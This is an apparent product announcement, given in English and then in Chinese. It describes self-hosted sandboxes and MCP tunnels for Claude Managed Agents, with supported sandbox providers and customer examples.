Starting today, Claude Managed Agents can operate in a sandbox you control and connect to your private Model Context Protocol (MCP) servers. Both the sandbox where an agent executes tools and the services it reaches run within the established boundaries of your enterprise, under your security and runtime controls. The sandbox runs on your own infrastructure, or with managed providers like Cloudflare , Daytona , Modal , or Vercel to handle the compute and isolation for you. On the Claude Platform, self-hosted sandboxes is available in public beta and MCP tunnels in research preview ( request access ). Keep agent execution within your perimeter With self-hosted sandboxes, you keep sensitive files, packages, and services in your own infrastructure or with a managed sandbox provider. The agent loop that handles orchestration, context management, and error recovery stays on Anthropic’s infrastructure, while tool execution moves to your own configured environment. Inside your perimeter, network policies, audit logging, and security tooling are already in place, and files and repositories don't leave. You also control the compute: resource sizing and the runtime image are set on your side, so agents running compute-heavy work such as long builds or image generation get the CPU, memory, and capacity the task needs. Choose your sandbox client Bring any sandbox client you want, or start with one of our supported providers: Cloudflare runs sandboxes at scale using microVMs and lighter weight isolates. Outbound network requests are in your control with zero-trust secrets injection, customizable proxies to audit, reroute, or modify egress, and the ability to connect to internal services over Cloudflare's network. Amplitude is building Design Agent, an internal tool for on-brand production UI and marketing design, on Managed Agents and Cloudflare for tighter observability and control. Daytona sandboxes are full composable computers, long-running and stateful. The same primitive runs a quick burst or an agent that works for hours. The sandbox stays accessible while a session runs over SSH or an authenticated preview URL, or can be paused and restored with full state preserved. Clay’s GTM engineering agent, Sculptor, builds, tests, and monitors workflows autonomously on Managed Agents and Daytona. Modal is a cloud platform built for AI workloads, where sandboxes share the same foundation as Modal's functions, storage, and networking primitives, giving you everything you need to build production AI systems. Modal's custom container runtime delivers sub-second startup on any image, scales to hundreds of thousands of concurrent sandboxes, and gives you CPU and GPU resources on demand. Vercel sandboxes combine VM security, VPC peering, and bring your own cloud with millisecond startup time. Managed Agents handles the model, tools, and session state, while the Vercel Sandbox firewall injects credentials at the network boundary so they never enter the sandbox. Rogo , an AI platform for institutional finance, is building an analyst agent on Managed Agents and Vercel Sandbox to handle their proprietary data securely. Connect to services within your private network With MCP tunnels , your agents reach MCP servers inside your private network without exposing them to the public internet. Internal databases, private APIs, knowledge bases, and ticketing systems become tools your agents can call. A lightweight gateway you deploy makes a single outbound connection, no inbound firewall rules, no public endpoints, and traffic encrypted end to end. MCP tunnels is supported in Managed Agents and the Messages API. MCP tunnels is managed from workspace settings within the Claude Console by organization admins.
从今天开始,Claude Managed Agents 可以在由你控制的 sandbox(沙箱)中运行,并连接到你的私有 Model Context Protocol(MCP)servers。agent 执行 tools 的 sandbox,以及它所访问的 services,都运行在你企业既定边界之内,受你的安全与运行时控制。这个 sandbox 可以运行在你自己的基础设施上,也可以交给 Cloudflare、Daytona、Modal 或 Vercel 等托管提供商来处理 compute(计算)与隔离。在 Claude Platform 上,self-hosted sandboxes 现已进入 public beta,MCP tunnels 处于 research preview 阶段(request access)。将 agent 的执行限制在你的边界内:通过 self-hosted sandboxes,你可以将敏感文件、packages 和 services 保留在自己的基础设施中,或保留在托管 sandbox 提供商处。负责 orchestration(编排)、context management(上下文管理)和 error recovery(错误恢复)的 agent loop 仍留在 Anthropic 的基础设施上,而 tool execution 则转移到你配置好的环境中。在你的边界内部,network policies、audit logging 和 security tooling 都已就位,文件和代码仓库也不会离开。你还可以控制 compute:资源规格和 runtime image 都由你这一侧设定,因此运行长时间 build 或 image generation 等高计算负载任务的 agents,能够获得任务所需的 CPU、内存和容量。选择你的 sandbox client:你可以接入任何想用的 sandbox client,也可以从我们支持的提供商开始。Cloudflare 使用 microVMs 和更轻量级的 isolates 大规模运行 sandboxes。出站网络请求由你控制,支持 zero-trust secrets injection、可定制 proxies 来审计、重路由或修改出站流量,并且能够通过 Cloudflare 的网络连接内部服务。Amplitude 正在基于 Managed Agents 和 Cloudflare 构建 Design Agent——一款用于符合品牌规范的生产级 UI 和营销设计的内部工具,以获得更强的可观测性和控制力。Daytona 的 sandboxes 是可完全组合的计算机,支持长时间运行并保留状态。同一种基础能力既可支持短时突发任务,也可支持连续工作数小时的 agent。session 运行期间,可通过 SSH 或经过认证的预览 URL 持续访问该 sandbox;也可以将其暂停并恢复,同时完整保留全部状态。Clay 的 GTM engineering agent——Sculptor——正在 Managed Agents 和 Daytona 上自主构建、测试并监控工作流。Modal 是一个为 AI 工作负载打造的云平台,在其中,sandboxes 与 Modal 的 functions、storage 和 networking primitives 共享同一基础,从而为你提供构建生产级 AI 系统所需的一切。Modal 的自定义容器运行时可在任何镜像上实现亚秒级启动,可扩展到数十万个并发 sandboxes,并按需提供 CPU 和 GPU 资源。Vercel sandboxes 将 VM 安全性、VPC peering 和 bring your own cloud 与毫秒级启动时间结合起来。Managed Agents 负责 model、tools 和 session state,而 Vercel Sandbox 的防火墙会在网络边界注入凭证,因此凭证永远不会进入 sandbox。面向机构金融的 AI 平台 Rogo,正在基于 Managed Agents 和 Vercel Sandbox 构建一款 analyst agent,以安全处理其专有数据。连接你私有网络中的服务:借助 MCP tunnels,你的 agents 可以访问位于私有网络内部的 MCP servers,而无需将其暴露到公共互联网。内部数据库、私有 API、知识库和工单系统都可以变成 agents 可调用的 tools。你部署的轻量级 gateway 只需建立一条出站连接,无需入站防火墙规则,无需公共端点,并且流量全程端到端加密。MCP tunnels 受 Managed Agents 和 Messages API 支持。MCP tunnels 由组织管理员在 Claude Console 的 workspace settings 中进行管理。